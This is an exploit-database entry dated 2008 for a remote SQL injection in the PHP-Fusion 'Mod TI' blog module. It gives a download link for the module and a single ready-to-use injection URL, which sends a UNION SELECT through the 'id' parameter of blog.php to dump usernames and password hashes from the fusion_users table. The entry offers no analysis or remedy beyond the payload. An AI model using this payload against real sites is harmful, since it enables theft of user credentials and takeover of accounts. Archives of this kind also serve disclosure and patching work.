id: 4553
date: 12/28/2008
title: PHP-Fusion Mod TI (id) Remote SQL Injection Vulnerability
author: IRCRASH
cves: 

=========================================================
PHP-Fusion Mod TI (id) Remote SQL Injection Vulnerability
=========================================================


#####################################################################################
####              	PHP-Fusion Mod TI - Blog System Sql Injection            ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#####################################################################################
#                                                                                   #
#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=157
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#http://Site/[path]/blog.php?page=blog_id&id=-9999'+union+select+0,1,2,user_name,user_password,5+from+fusion_users/*
#                                                                                   #
#####################################################################################



#  0day.today [2023-03-25]  #